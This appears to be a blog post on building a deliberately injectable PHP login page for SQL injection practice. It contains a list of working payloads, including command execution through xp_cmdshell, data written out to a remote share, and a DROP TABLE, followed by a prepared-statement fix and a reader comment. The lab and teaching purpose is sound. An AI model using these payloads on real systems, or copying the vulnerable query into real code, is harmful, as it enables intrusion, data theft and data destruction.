```php
// Deliberately vulnerable: the POSTed values are concatenated straight into the SQL text.
$query = "SELECT * FROM users WHERE username = '" . stripslashes($_POST['username'])
       . "' AND password = '" . stripslashes($_POST['password']) . "'";
```
and enjoy! The stripslashes() call is there in case you haven't disabled magic_quotes yet (as you should have): it undoes the automatic escaping, so you get the purest injectable input. Just pick any SQL injection you find on the internet and try it. Some examples:

' or 1=1--
' or 1--
' or 1
\" or '1'
' or 1=1--
' OR ''='
' or 'a'='a
') or ('a'='a
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='
' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='
' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1;DROP TABLE `users`
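As an added example (not the post's own code), here is the concatenated query beside a prepared-statement version, run against an in-memory SQLite table so it needs no server; the table and column names are assumed to match the post, and the first payload from the list above is used as the constructed username. With concatenation the comment sequence swallows the password check and every row matches; with placeholders the same input is compared as plain data and nothing matches.

```php
<?php
// Assumed schema: users(username, password), matching the query in the post.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT, password TEXT)');

// Store a salted hash rather than the plaintext; password_hash() chooses the salt.
$ins = $db->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
$ins->execute(['jake', password_hash('s3cret', PASSWORD_DEFAULT)]);

// Constructed input: the first payload from the list above and an empty password.
$username = "' or 1=1--";
$password = '';

// 1. Vulnerable form, as in the post: the input becomes part of the SQL text,
//    so the quote closes the literal and "--" comments out the password clause.
$vulnerable = "SELECT * FROM users WHERE username = '" . $username
            . "' AND password = '" . $password . "'";
$rows = $db->query($vulnerable)->fetchAll(PDO::FETCH_ASSOC);
echo "concatenated query matched " . count($rows) . " row(s)\n";

// 2. Fixed form: a placeholder keeps the input as data, so the quote and "--"
//    are compared literally against the username column; the password is then
//    checked against the stored hash in PHP rather than inside the SQL.
$stmt = $db->prepare('SELECT username, password FROM users WHERE username = ?');
$stmt->execute([$username]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
$ok = $user !== false && password_verify($password, $user['password']);
echo "prepared statement login " . ($ok ? 'succeeded' : 'rejected') . "\n";
```

Run it with the php CLI; it requires the pdo_sqlite extension, which ships with most PHP builds.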

The coding given in the blog for creating the sql injection test site is very useful for those who are actually seeking to create it with perfection. Good one, thank you for sharing.